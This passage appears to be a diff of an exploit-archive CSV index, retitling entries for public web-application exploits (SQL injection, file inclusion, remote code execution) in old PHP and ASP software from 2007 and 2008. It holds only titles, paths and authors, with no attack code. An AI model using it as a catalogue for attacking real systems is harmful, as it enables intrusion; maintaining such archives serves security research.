4102,platforms/php/webapps/4102.txt,"b1gbb 2.24.0 - (footer.inc.php tfooter) Remote File Inclusion",2007-06-25,Rf7awy,php,webapps,0 -4103,platforms/php/webapps/4103.txt,"bugmall shopping cart 2.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2007-06-25,t0pP8uZz,php,webapps,0 +4103,platforms/php/webapps/4103.txt,"bugmall shopping cart 2.5 - SQL Injection / Cross-Site Scripting",2007-06-25,t0pP8uZz,php,webapps,0 4104,platforms/php/webapps/4104.txt,"6ALBlog - 'newsid' SQL Injection",2007-06-25,Crackers_Child,php,webapps,0 4105,platforms/php/webapps/4105.txt,"SiteDepth CMS 3.44 - (ShowImage.php name) File Disclosure",2007-06-25,"H4 / XPK",php,webapps,0 4106,platforms/php/webapps/4106.php,"DreamLog 0.5 - (upload.php) Arbitrary File Upload",2007-06-25,Dj7xpl,php,webapps,0 @@ -17773,7 +17776,7 @@ id,file,description,date,author,platform,type,port 4147,platforms/php/webapps/4147.php,"PNPHPBB2 <= 1.2i - viewforum.php SQL Injection",2007-07-03,Coloss,php,webapps,0 4150,platforms/php/webapps/4150.txt,"VRNews 1.1.1 - 'admin.php' Remote Security Bypass",2007-07-05,R4M!,php,webapps,0 4151,platforms/php/webapps/4151.sh,"AsteriDex 3.0 - (callboth.php) Remote Code Execution",2007-07-05,"Carl Livitt",php,webapps,0 -4153,platforms/php/webapps/4153.txt,"PHPVID 0.9.9 - (categories_type.php cat) SQL Injection",2007-07-06,t0pP8uZz,php,webapps,0 +4153,platforms/php/webapps/4153.txt,"PHPVID 0.9.9 - 'categories_type.php' SQL Injection",2007-07-06,t0pP8uZz,php,webapps,0 4154,platforms/php/webapps/4154.txt,"eMeeting Online Dating Software 5.2 - SQL Injection",2007-07-06,t0pP8uZz,php,webapps,0 4156,platforms/php/webapps/4156.txt,"LimeSurvey (phpsurveyor) 1.49rc2 - Remote File Inclusion",2007-07-06,"Yakir Wizman",php,webapps,0 4159,platforms/php/webapps/4159.txt,"GameSiteScript 3.1 - (profile id) SQL Injection",2007-07-07,Xenduer77,php,webapps,0 @@ -18061,7 +18064,7 @@ id,file,description,date,author,platform,type,port 4634,platforms/php/webapps/4634.php,"IceBB 1.0-rc6 - Remote Database Authentication Details Exploit",2007-11-18,Gu1ll4um3r0m41n,php,webapps,0 4635,platforms/php/webapps/4635.php,"Sciurus Hosting Panel - Remote Code Injection",2007-11-18,Liz0ziM,php,webapps,0 4636,platforms/php/webapps/4636.txt,"Joomla! Component juser 1.0.14 - Remote File Inclusion",2007-11-19,NoGe,php,webapps,0 -4637,platforms/php/webapps/4637.txt,"bcoos 1.0.10 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2007-11-20,BugReport.IR,php,webapps,0 +4637,platforms/php/webapps/4637.txt,"bcoos 1.0.10 - Local File Inclusion / SQL Injection",2007-11-20,BugReport.IR,php,webapps,0 4638,platforms/php/webapps/4638.txt,"skyportal vrc6 - Multiple Vulnerabilities",2007-11-20,BugReport.IR,php,webapps,0 4639,platforms/php/webapps/4639.htm,"Ucms 1.8 - Backdoor Remote Command Execution",2007-11-21,D4m14n,php,webapps,0 4640,platforms/php/webapps/4640.txt,"TalkBack 2.2.7 - Multiple Remote File Inclusion",2007-11-21,NoGe,php,webapps,0 @@ -18099,7 +18102,7 @@ id,file,description,date,author,platform,type,port 4678,platforms/php/webapps/4678.php,"Seditio CMS 121 - SQL Injection",2007-11-29,InATeam,php,webapps,0 4679,platforms/php/webapps/4679.txt,"KML share 1.1 - (region.php layer) Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0 4680,platforms/php/webapps/4680.txt,"LearnLoop 2.0beta7 - (sFilePath) Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0 -4681,platforms/php/webapps/4681.txt,"ftp Admin 0.1.0 - (Local File Inclusion / Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities",2007-11-29,Omni,php,webapps,0 +4681,platforms/php/webapps/4681.txt,"ftp Admin 0.1.0 - Local File Inclusion / Cross-Site Scripting / Authentication Bypass",2007-11-29,Omni,php,webapps,0 4684,platforms/php/webapps/4684.txt,"tellmatic 1.0.7 - Multiple Remote File Inclusion",2007-12-01,ShAy6oOoN,php,webapps,0 4685,platforms/php/webapps/4685.txt,"Rayzz Script 2.0 - Remote File Inclusion / Local File Inclusion",2007-12-01,Crackers_Child,php,webapps,0 4686,platforms/php/webapps/4686.txt,"phpBB Garage 1.2.0 Beta3 - SQL Injection",2007-12-03,maku234,php,webapps,0 @@ -18118,7 +18121,7 @@ id,file,description,date,author,platform,type,port 4709,platforms/php/webapps/4709.txt,"SH-News 3.0 - 'comments.php' SQL Injection",2007-12-09,hadihadi,php,webapps,0 4710,platforms/php/webapps/4710.txt,"Lotfian.com DATABASE DRIVEN TRAVEL SITE - SQL Injection",2007-12-10,"Aria-Security Team",php,webapps,0 4711,platforms/php/webapps/4711.txt,"Falt4 CMS rc4 10.9.2007 - Multiple Vulnerabilities",2007-12-10,"H-Security Labs",php,webapps,0 -4712,platforms/php/webapps/4712.txt,"falcon CMS 1.4.3 - (Remote File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2007-12-10,MhZ91,php,webapps,0 +4712,platforms/php/webapps/4712.txt,"falcon CMS 1.4.3 - Remote File Inclusion / Cross-Site Scripting",2007-12-10,MhZ91,php,webapps,0 4714,platforms/php/webapps/4714.pl,"MonAlbum 0.87 - Arbitrary File Upload / Password Grabber Exploit",2007-12-10,v0l4arrra,php,webapps,0 4718,platforms/php/webapps/4718.rb,"SquirrelMail G/PGP Encryption Plugin - deletekey() Command Injection",2007-12-11,Backdoored,php,webapps,0 4719,platforms/php/webapps/4719.txt,"Mcms Easy Web Make - 'index.php template' Local File Inclusion",2007-12-11,MhZ91,php,webapps,0 @@ -18136,7 +18139,7 @@ id,file,description,date,author,platform,type,port 4735,platforms/php/webapps/4735.txt,"Oreon 1.4 / Centreon 1.4.1 - Multiple Remote File Inclusion Vulnerabilities",2007-12-14,"Michael Brooks",php,webapps,0 4736,platforms/php/webapps/4736.txt,"Form Tools 1.5.0b - Multiple Remote File Inclusion",2007-12-14,RoMaNcYxHaCkEr,php,webapps,0 4737,platforms/php/webapps/4737.txt,"PHP Real Estate - 'fullnews.php id' SQL Injection",2007-12-14,t0pP8uZz,php,webapps,0 -4738,platforms/php/webapps/4738.txt,"gf-3xplorer 2.4 - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities",2007-12-18,MhZ91,php,webapps,0 +4738,platforms/php/webapps/4738.txt,"gf-3xplorer 2.4 - Cross-Site Scripting / Local File Inclusion",2007-12-18,MhZ91,php,webapps,0 4739,platforms/php/webapps/4739.pl,"MOG-WebShop - 'index.php group' SQL Injection",2007-12-18,k1tk4t,php,webapps,0 4740,platforms/php/webapps/4740.pl,"FreeWebShop 2.2.1 - Blind SQL Injection",2007-12-18,k1tk4t,php,webapps,0 4741,platforms/php/webapps/4741.txt,"MySpace Content Zone 3.x - Arbitrary File Upload",2007-12-18,Don,php,webapps,0 @@ -18219,11 +18222,11 @@ id,file,description,date,author,platform,type,port 4845,platforms/php/webapps/4845.pl,"RunCMS Newbb_plus 0.92 - Client IP SQL Injection",2008-01-06,"Eugene Minaev",php,webapps,0 4846,platforms/php/webapps/4846.txt,"Uebimiau Web-Mail 2.7.10/2.7.2 - Remote File Disclosure",2008-01-06,"Eugene Minaev",php,webapps,0 4847,platforms/php/webapps/4847.txt,"XOOPS mod_gallery Zend_Hash_key + Extract - Remote File Inclusion",2008-01-06,"Eugene Minaev",php,webapps,0 -4848,platforms/asp/webapps/4848.txt,"PortalApp 4.0 - (SQL Injection / Cross-Site Scripting / Authentication Bypass) Multiple Vulnerabilities",2008-01-06,r3dm0v3,asp,webapps,0 +4848,platforms/asp/webapps/4848.txt,"PortalApp 4.0 - SQL Injection / Cross-Site Scripting / Authentication Bypass",2008-01-06,r3dm0v3,asp,webapps,0 4849,platforms/php/webapps/4849.txt,"LoudBlog 0.6.1 - 'parsedpage' Parameter Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0 4850,platforms/php/webapps/4850.txt,"Horde Web-Mail 3.x - 'go.php' Remote File Disclosure",2008-01-06,"Eugene Minaev",php,webapps,0 4851,platforms/php/webapps/4851.txt,"CuteNews 1.1.1 - 'html.php' Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0 -4852,platforms/php/webapps/4852.txt,"netrisk 1.9.7 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-01-06,"Virangar Security",php,webapps,0 +4852,platforms/php/webapps/4852.txt,"netrisk 1.9.7 - Cross-Site Scripting / SQL Injection",2008-01-06,"Virangar Security",php,webapps,0 4853,platforms/php/webapps/4853.php,"DCP-Portal 6.11 - SQL Injection",2008-01-06,x0kster,php,webapps,0 4854,platforms/php/webapps/4854.txt,"SineCMS 2.3.5 - Local File Inclusion / Remote Code Execution",2008-01-06,KiNgOfThEwOrLd,php,webapps,0 4855,platforms/php/webapps/4855.txt,"Shop-Script 2.0 - 'index.php' Remote File Disclosure",2008-01-06,Fisher762,php,webapps,0 @@ -19350,54 +19353,54 @@ id,file,description,date,author,platform,type,port 6338,platforms/php/webapps/6338.txt,"myPHPNuke < 1.8.8_8rc2 - Cross-Site Scripting / SQL Injection",2008-08-31,MustLive,php,webapps,0 6339,platforms/php/webapps/6339.txt,"webid 0.5.4 - Multiple Vulnerabilities",2008-08-31,InjEctOr5,php,webapps,0 6341,platforms/php/webapps/6341.txt,"WeBid 0.5.4 - 'item.php' SQL Injection",2008-09-01,Stack,php,webapps,0 -6342,platforms/php/webapps/6342.txt,"EasyClassifields 3.0 - (go) SQL Injection",2008-09-01,e.wiZz!,php,webapps,0 -6343,platforms/php/webapps/6343.txt,"CMSbright - (id_rub_page) SQL Injection",2008-09-01,"BorN To K!LL",php,webapps,0 +6342,platforms/php/webapps/6342.txt,"EasyClassifields 3.0 - 'go' Parameter SQL Injection",2008-09-01,e.wiZz!,php,webapps,0 +6343,platforms/php/webapps/6343.txt,"CMSbright - 'id_rub_page' Parameter SQL Injection",2008-09-01,"BorN To K!LL",php,webapps,0 6344,platforms/php/webapps/6344.php,"WeBid 0.5.4 - 'FCKeditor' Arbitrary File Upload",2008-09-01,Stack,php,webapps,0 6346,platforms/php/webapps/6346.pl,"e107 Plugin BLOG Engine 2.2 - 'uid' Parameter SQL Injection",2008-09-01,"Virangar Security",php,webapps,0 -6347,platforms/php/webapps/6347.txt,"myPHPNuke < 1.8.8_8rc2 - 'artid' SQL Injection",2008-09-02,MustLive,php,webapps,0 -6348,platforms/php/webapps/6348.txt,"Coupon Script 4.0 - 'id' SQL Injection",2008-09-02,"Hussin X",php,webapps,0 -6349,platforms/php/webapps/6349.txt,"Reciprocal Links Manager 1.1 - (site) SQL Injection",2008-09-02,"Hussin X",php,webapps,0 +6347,platforms/php/webapps/6347.txt,"myPHPNuke < 1.8.8_8rc2 - 'artid' Parameter SQL Injection",2008-09-02,MustLive,php,webapps,0 +6348,platforms/php/webapps/6348.txt,"Coupon Script 4.0 - 'id' Parameter SQL Injection",2008-09-02,"Hussin X",php,webapps,0 +6349,platforms/php/webapps/6349.txt,"Reciprocal Links Manager 1.1 - 'site' Parameter SQL Injection",2008-09-02,"Hussin X",php,webapps,0 6350,platforms/php/webapps/6350.txt,"AJ HYIP ACME - 'comment.php' SQL Injection",2008-09-02,"security fears team",php,webapps,0 6351,platforms/php/webapps/6351.txt,"AJ HYIP ACME - 'readarticle.php' SQL Injection",2008-09-02,InjEctOr5,php,webapps,0 -6352,platforms/php/webapps/6352.txt,"CS-Cart 1.3.5 - (Authentication Bypass) SQL Injection",2008-09-02,"GulfTech Security",php,webapps,0 -6354,platforms/php/webapps/6354.txt,"Spice Classifieds - (cat_path) SQL Injection",2008-09-03,InjEctOr5,php,webapps,0 +6352,platforms/php/webapps/6352.txt,"CS-Cart 1.3.5 - Authentication Bypass",2008-09-02,"GulfTech Security",php,webapps,0 +6354,platforms/php/webapps/6354.txt,"Spice Classifieds - 'cat_path' Parameter SQL Injection",2008-09-03,InjEctOr5,php,webapps,0 6356,platforms/php/webapps/6356.php,"Moodle 1.8.4 - Remote Code Execution",2008-09-03,zurlich.lpt,php,webapps,0 -6357,platforms/php/webapps/6357.txt,"aspwebalbum 3.2 - (Arbitrary File Upload / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-09-03,Alemin_Krali,php,webapps,0 +6357,platforms/php/webapps/6357.txt,"aspwebalbum 3.2 - Arbitrary File Upload / SQL Injection / Cross-Site Scripting",2008-09-03,Alemin_Krali,php,webapps,0 6360,platforms/php/webapps/6360.txt,"TransLucid 1.75 - 'FCKeditor' Arbitrary File Upload",2008-09-03,BugReport.IR,php,webapps,0 -6361,platforms/php/webapps/6361.txt,"Living Local Website - 'listtest.php r' SQL Injection",2008-09-03,"Hussin X",php,webapps,0 -6362,platforms/php/webapps/6362.txt,"ACG-PTP 1.0.6 - 'adid' SQL Injection",2008-09-04,"Hussin X",php,webapps,0 -6363,platforms/php/webapps/6363.txt,"qwicsite pro - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-09-04,Cr@zy_King,php,webapps,0 -6364,platforms/php/webapps/6364.txt,"ACG-ScriptShop - 'cid' SQL Injection",2008-09-04,"Hussin X",php,webapps,0 -6368,platforms/php/webapps/6368.php,"AWStats Totals - 'AWStatstotals.php sort' Remote Code Execution",2008-09-05,"Ricardo Almeida",php,webapps,0 +6361,platforms/php/webapps/6361.txt,"Living Local Website - 'listtest.php' SQL Injection",2008-09-03,"Hussin X",php,webapps,0 +6362,platforms/php/webapps/6362.txt,"ACG-PTP 1.0.6 - 'adid' Parameter SQL Injection",2008-09-04,"Hussin X",php,webapps,0 +6363,platforms/php/webapps/6363.txt,"qwicsite pro - SQL Injection / Cross-Site Scripting",2008-09-04,Cr@zy_King,php,webapps,0 +6364,platforms/php/webapps/6364.txt,"ACG-ScriptShop - 'cid' Parameter SQL Injection",2008-09-04,"Hussin X",php,webapps,0 +6368,platforms/php/webapps/6368.php,"AWStats Totals 1.14 - 'AWStatstotals.php' Remote Code Execution",2008-09-05,"Ricardo Almeida",php,webapps,0 6369,platforms/php/webapps/6369.py,"Devalcms 1.4a - Cross-Site Scripting / Remote Code Execution",2008-09-05,"Khashayar Fereidani",php,webapps,0 6370,platforms/php/webapps/6370.pl,"WebCMS Portal Edition - 'id' Parameter Blind SQL Injection",2008-09-05,JosS,php,webapps,0 -6371,platforms/php/webapps/6371.txt,"Vastal I-Tech Agent Zone - (ann_id) SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 -6373,platforms/php/webapps/6373.txt,"Vastal I-Tech Visa Zone - (news_id) SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 -6374,platforms/php/webapps/6374.txt,"Vastal I-Tech Toner Cart - 'id' SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 -6375,platforms/php/webapps/6375.txt,"Vastal I-Tech Share Zone - 'id' SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 -6376,platforms/php/webapps/6376.txt,"Vastal I-Tech DVD Zone - 'cat_id' SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 -6378,platforms/php/webapps/6378.txt,"Vastal I-Tech Jobs Zone - (news_id) SQL Injection",2008-09-05,Stack,php,webapps,0 -6379,platforms/php/webapps/6379.txt,"Vastal I-Tech MMORPG Zone - (game_id) SQL Injection",2008-09-05,Stack,php,webapps,0 -6380,platforms/php/webapps/6380.txt,"Vastal I-Tech Mag Zone - 'cat_id' SQL Injection",2008-09-05,Stack,php,webapps,0 -6381,platforms/php/webapps/6381.txt,"Vastal I-Tech Freelance Zone - (coder_id) SQL Injection",2008-09-05,Stack,php,webapps,0 -6382,platforms/php/webapps/6382.txt,"Vastal I-Tech Cosmetics Zone - 'cat_id' SQL Injection",2008-09-05,Stack,php,webapps,0 -6383,platforms/php/webapps/6383.txt,"EsFaq 2.0 - (idcat) SQL Injection",2008-09-05,SuB-ZeRo,php,webapps,0 -6385,platforms/php/webapps/6385.txt,"Vastal I-Tech Shaadi Zone 1.0.9 - (tage) SQL Injection",2008-09-05,e.wiZz!,php,webapps,0 -6388,platforms/php/webapps/6388.txt,"Vastal I-Tech Dating Zone - (fage) SQL Injection",2008-09-06,ZoRLu,php,webapps,0 +6371,platforms/php/webapps/6371.txt,"Vastal I-Tech Agent Zone - 'ann_id' Parameter SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 +6373,platforms/php/webapps/6373.txt,"Vastal I-Tech Visa Zone - 'news_id' Parameter SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 +6374,platforms/php/webapps/6374.txt,"Vastal I-Tech Toner Cart - 'id' Parameter SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 +6375,platforms/php/webapps/6375.txt,"Vastal I-Tech Share Zone - 'id' Parameter SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 +6376,platforms/php/webapps/6376.txt,"Vastal I-Tech DVD Zone - 'cat_id' Parameter SQL Injection",2008-09-05,"DeViL iRaQ",php,webapps,0 +6378,platforms/php/webapps/6378.txt,"Vastal I-Tech Jobs Zone - 'news_id' Parameter SQL Injection",2008-09-05,Stack,php,webapps,0 +6379,platforms/php/webapps/6379.txt,"Vastal I-Tech MMORPG Zone - 'game_id' Parameter SQL Injection",2008-09-05,Stack,php,webapps,0 +6380,platforms/php/webapps/6380.txt,"Vastal I-Tech Mag Zone - 'cat_id' Parameter SQL Injection",2008-09-05,Stack,php,webapps,0 +6381,platforms/php/webapps/6381.txt,"Vastal I-Tech Freelance Zone - 'coder_id' Parameter SQL Injection",2008-09-05,Stack,php,webapps,0 +6382,platforms/php/webapps/6382.txt,"Vastal I-Tech Cosmetics Zone - 'cat_id' Parameter SQL Injection",2008-09-05,Stack,php,webapps,0 +6383,platforms/php/webapps/6383.txt,"EsFaq 2.0 - 'idcat' Parameter SQL Injection",2008-09-05,SuB-ZeRo,php,webapps,0 +6385,platforms/php/webapps/6385.txt,"Vastal I-Tech Shaadi Zone 1.0.9 - 'tage' Parameter SQL Injection",2008-09-05,e.wiZz!,php,webapps,0 +6388,platforms/php/webapps/6388.txt,"Vastal I-Tech Dating Zone - 'fage' Parameter SQL Injection",2008-09-06,ZoRLu,php,webapps,0 6390,platforms/php/webapps/6390.txt,"Integramod 1.4.x - (Insecure Directory) Download Database",2008-09-06,TheJT,php,webapps,0 6392,platforms/php/webapps/6392.php,"Simple Machines Forum (SMF) 1.1.5 (Windows x86) - Admin Reset Password Exploit",2008-09-06,Raz0r,php,webapps,0 6393,platforms/php/webapps/6393.pl,"MemHT Portal 3.9.0 - Remote Create Shell Exploit",2008-09-06,Ams,php,webapps,0 -6395,platforms/php/webapps/6395.txt,"Masir Camp E-Shop Module 3.0 - (ordercode) SQL Injection",2008-09-07,BugReport.IR,php,webapps,0 -6396,platforms/php/webapps/6396.txt,"Alstrasoft Forum - (cat) SQL Injection",2008-09-07,r45c4l,php,webapps,0 +6395,platforms/php/webapps/6395.txt,"Masir Camp E-Shop Module 3.0 - 'ordercode' Parameter SQL Injection",2008-09-07,BugReport.IR,php,webapps,0 +6396,platforms/php/webapps/6396.txt,"Alstrasoft Forum - 'cat' Parameter SQL Injection",2008-09-07,r45c4l,php,webapps,0 6397,platforms/php/webapps/6397.txt,"WordPress 2.6.1 - SQL Column Truncation",2008-09-07,irk4z,php,webapps,0 6398,platforms/php/webapps/6398.txt,"E-Shop Shopping Cart Script - 'search_results.php' SQL Injection",2008-09-07,Mormoroth,php,webapps,0 -6401,platforms/php/webapps/6401.txt,"Alstrasoft Forum - 'catid' SQL Injection",2008-09-09,r45c4l,php,webapps,0 +6401,platforms/php/webapps/6401.txt,"Alstrasoft Forum - 'catid' Parameter SQL Injection",2008-09-09,r45c4l,php,webapps,0 6402,platforms/php/webapps/6402.txt,"Stash 1.0.3 - Multiple SQL Injections",2008-09-09,"Khashayar Fereidani",php,webapps,0 6403,platforms/php/webapps/6403.txt,"Hot Links SQL-PHP 3 - 'report.php' Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0 6404,platforms/php/webapps/6404.txt,"Live TV Script - 'index.php mid' SQL Injection",2008-09-09,InjEctOr5,php,webapps,0 -6405,platforms/asp/webapps/6405.txt,"Creator CMS 5.0 - (sideid) SQL Injection",2008-09-09,"ThE X-HaCkEr",asp,webapps,0 +6405,platforms/asp/webapps/6405.txt,"Creator CMS 5.0 - 'sideid' Parameter SQL Injection",2008-09-09,"ThE X-HaCkEr",asp,webapps,0 6406,platforms/php/webapps/6406.txt,"Stash 1.0.3 - Insecure Cookie Handling",2008-09-09,Ciph3r,php,webapps,0 -6408,platforms/php/webapps/6408.txt,"CMS Buzz - 'id' SQL Injection",2008-09-09,"security fears team",php,webapps,0 +6408,platforms/php/webapps/6408.txt,"CMS Buzz - 'id' Parameter SQL Injection",2008-09-09,"security fears team",php,webapps,0 6409,platforms/php/webapps/6409.txt,"AvailScript Article Script - 'articles.php' Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0 6410,platforms/php/webapps/6410.txt,"Kim Websites 1.0 - 'FCKeditor' Arbitrary File Upload",2008-09-09,Ciph3r,php,webapps,0 6411,platforms/php/webapps/6411.txt,"AvailScript Photo Album - 'pics.php' Multiple Vulnerabilities",2008-09-09,sl4xUz,php,webapps,0 @@ -19408,18 +19411,18 @@ id,file,description,date,author,platform,type,port 6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite 2.1 / Jaw Portal free - 'FCKeditor' Arbitrary File Upload",2008-09-10,reptil,php,webapps,0 6420,platforms/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps,0 6421,platforms/php/webapps/6421.php,"WordPress 2.6.1 - (SQL Column Truncation) Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0 -6422,platforms/php/webapps/6422.txt,"phpVID 1.1 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-09-10,r45c4l,php,webapps,0 -6423,platforms/php/webapps/6423.txt,"Zanfi CMS lite / Jaw Portal free - 'page' SQL Injection",2008-09-10,Cru3l.b0y,php,webapps,0 -6425,platforms/php/webapps/6425.txt,"PhpWebGallery 1.3.4 - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities",2008-09-11,"Khashayar Fereidani",php,webapps,0 -6426,platforms/php/webapps/6426.txt,"Autodealers CMS AutOnline - (pageid) SQL Injection",2008-09-11,r45c4l,php,webapps,0 -6427,platforms/php/webapps/6427.txt,"Sports Clubs Web Panel 0.0.1 - (p) Local File Inclusion",2008-09-11,StAkeR,php,webapps,0 +6422,platforms/php/webapps/6422.txt,"PHPVID 1.1 - Cross-Site Scripting / SQL Injection",2008-09-10,r45c4l,php,webapps,0 +6423,platforms/php/webapps/6423.txt,"Zanfi CMS lite / Jaw Portal free - 'page' Parameter SQL Injection",2008-09-10,Cru3l.b0y,php,webapps,0 +6425,platforms/php/webapps/6425.txt,"PhpWebGallery 1.3.4 - Cross-Site Scripting / Local File Inclusion",2008-09-11,"Khashayar Fereidani",php,webapps,0 +6426,platforms/php/webapps/6426.txt,"Autodealers CMS AutOnline - 'pageid' Parameter SQL Injection",2008-09-11,r45c4l,php,webapps,0 +6427,platforms/php/webapps/6427.txt,"Sports Clubs Web Panel 0.0.1 - 'p' Parameter Local File Inclusion",2008-09-11,StAkeR,php,webapps,0 6428,platforms/php/webapps/6428.pl,"Easy Photo Gallery 2.1 - Cross-Site Scripting / File Disclosure/Bypass / SQL Injection",2008-09-11,"Khashayar Fereidani",php,webapps,0 6430,platforms/php/webapps/6430.txt,"D-iscussion Board 3.01 - (topic) Local File Inclusion",2008-09-11,SirGod,php,webapps,0 6431,platforms/php/webapps/6431.pl,"phsBlog 0.2 - Bypass SQL Injection Filtering Exploit",2008-09-11,"Khashayar Fereidani",php,webapps,0 6432,platforms/php/webapps/6432.py,"minb 0.1.0 - Remote Code Execution",2008-09-11,"Khashayar Fereidani",php,webapps,0 -6433,platforms/php/webapps/6433.txt,"Autodealers CMS AutOnline - 'id' SQL Injection",2008-09-11,ZoRLu,php,webapps,0 -6435,platforms/php/webapps/6435.txt,"Sports Clubs Web Panel 0.0.1 - 'id' SQL Injection",2008-09-11,"Virangar Security",php,webapps,0 -6436,platforms/php/webapps/6436.txt,"PhpWebGallery 1.3.4 - (cat) Blind SQL Injection",2008-09-11,Stack,php,webapps,0 +6433,platforms/php/webapps/6433.txt,"Autodealers CMS AutOnline - 'id' Parameter SQL Injection",2008-09-11,ZoRLu,php,webapps,0 +6435,platforms/php/webapps/6435.txt,"Sports Clubs Web Panel 0.0.1 - 'id' Parameter SQL Injection",2008-09-11,"Virangar Security",php,webapps,0 +6436,platforms/php/webapps/6436.txt,"PhpWebGallery 1.3.4 - Blind SQL Injection",2008-09-11,Stack,php,webapps,0 6437,platforms/php/webapps/6437.txt,"Easy Photo Gallery 2.1 - Arbitrary Add Admin / remove user",2008-09-11,Stack,php,webapps,0 6438,platforms/php/webapps/6438.pl,"Yourownbux 4.0 - 'cookie' Authentication Bypass",2008-09-11,Tec-n0x,php,webapps,0 6439,platforms/php/webapps/6439.txt,"Sports Clubs Web Panel 0.0.1 - Arbitrary File Upload",2008-09-12,Stack,php,webapps,0 @@ -19434,7 +19437,7 @@ id,file,description,date,author,platform,type,port 6449,platforms/php/webapps/6449.php,"pLink 2.07 - (linkto.php id) Blind SQL Injection",2008-09-13,Stack,php,webapps,0 6450,platforms/php/webapps/6450.pl,"Sports Clubs Web Panel 0.0.1 - Remote Game Delete Exploit",2008-09-13,ka0x,php,webapps,0 6451,platforms/php/webapps/6451.txt,"Talkback 2.3.6 - Multiple Local File Inclusion / PHPInfo Disclosure Vulnerabilities",2008-09-13,SirGod,php,webapps,0 -6452,platforms/php/webapps/6452.txt,"phpsmartcom 0.2 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2008-09-13,r3dm0v3,php,webapps,0 +6452,platforms/php/webapps/6452.txt,"phpsmartcom 0.2 - Local File Inclusion / SQL Injection",2008-09-13,r3dm0v3,php,webapps,0 6453,platforms/asp/webapps/6453.txt,"FoT Video scripti 1.1b - (oyun) SQL Injection",2008-09-13,Crackers_Child,asp,webapps,0 6455,platforms/php/webapps/6455.txt,"Linkarity - 'link.php' SQL Injection",2008-09-13,"Egypt Coder",php,webapps,0 6456,platforms/php/webapps/6456.txt,"Free PHP VX Guestbook 1.06 - Arbitrary Database Backup",2008-09-13,SirGod,php,webapps,0 @@ -19485,7 +19488,7 @@ id,file,description,date,author,platform,type,port 6519,platforms/php/webapps/6519.php,"PHP iCalendar 2.24 - (cookie_language) Local File Inclusion / Arbitrary File Upload",2008-09-21,EgiX,php,webapps,0 6520,platforms/php/webapps/6520.txt,"6rbScript 3.3 - 'section.php' Local File Inclusion",2008-09-21,Stack,php,webapps,0 6521,platforms/php/webapps/6521.txt,"Rianxosencabos CMS 0.9 - Insecure Cookie Handling",2008-09-21,Stack,php,webapps,0 -6522,platforms/php/webapps/6522.txt,"AvailScript Article Script - 'view.php v' SQL Injection",2008-09-21,"Hussin X",php,webapps,0 +6522,platforms/php/webapps/6522.txt,"AvailScript Article Script - 'view.php' SQL Injection",2008-09-21,"Hussin X",php,webapps,0 6523,platforms/php/webapps/6523.php,"WCMS 1.0b - Arbitrary Add Admin",2008-09-22,"CWH Underground",php,webapps,0 6524,platforms/php/webapps/6524.txt,"WSN Links 2.22/2.23 - (vote.php) SQL Injection",2008-09-22,d3v1l,php,webapps,0 6525,platforms/php/webapps/6525.txt,"WSN Links 2.20 - 'comments.php' SQL Injection",2008-09-22,d3v1l,php,webapps,0 @@ -19606,7 +19609,7 @@ id,file,description,date,author,platform,type,port 6675,platforms/php/webapps/6675.pl,"Galerie 3.2 - (pic) WBB Lite Addon Blind SQL Injection",2008-10-05,J0hn.X3r,php,webapps,0 6676,platforms/php/webapps/6676.txt,"OpenNMS < 1.5.96 - Multiple Vulnerabilities",2008-10-05,"BugSec LTD",php,webapps,0 6677,platforms/php/webapps/6677.pl,"geccBBlite 2.0 - (leggi.php id) SQL Injection",2008-10-05,Piker,php,webapps,0 -6678,platforms/php/webapps/6678.txt,"Fastpublish CMS 1.9999 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2008-10-05,~!Dok_tOR!~,php,webapps,0 +6678,platforms/php/webapps/6678.txt,"Fastpublish CMS 1.9999 - Local File Inclusion / SQL Injection",2008-10-05,~!Dok_tOR!~,php,webapps,0 6679,platforms/php/webapps/6679.txt,"phpAbook 0.8.8b - 'cookie' Local File Inclusion",2008-10-05,JosS,php,webapps,0 6680,platforms/php/webapps/6680.txt,"FOSS Gallery Public 1.0 - Arbitrary File Upload",2008-10-05,Pepelux,php,webapps,0 6681,platforms/php/webapps/6681.txt,"PHP-Fusion Mod manuals - 'manual' Parameter SQL Injection",2008-10-05,boom3rang,php,webapps,0 @@ -19647,7 +19650,7 @@ id,file,description,date,author,platform,type,port 6729,platforms/php/webapps/6729.php,"SlimCMS 1.0.0 - (redirect.php) Privilege Escalation",2008-10-10,StAkeR,php,webapps,0 6730,platforms/php/webapps/6730.txt,"Joomla! Component ownbiblio 1.5.3 - 'catid' SQL Injection",2008-10-11,H!tm@N,php,webapps,0 6731,platforms/asp/webapps/6731.txt,"Absolute Poll Manager XE 4.1 - 'xlacomments.asp' SQL Injection",2008-10-11,Hakxer,asp,webapps,0 -6733,platforms/php/webapps/6733.txt,"mini-pub 0.3 - (File Disclosure/Code Execution) Multiple 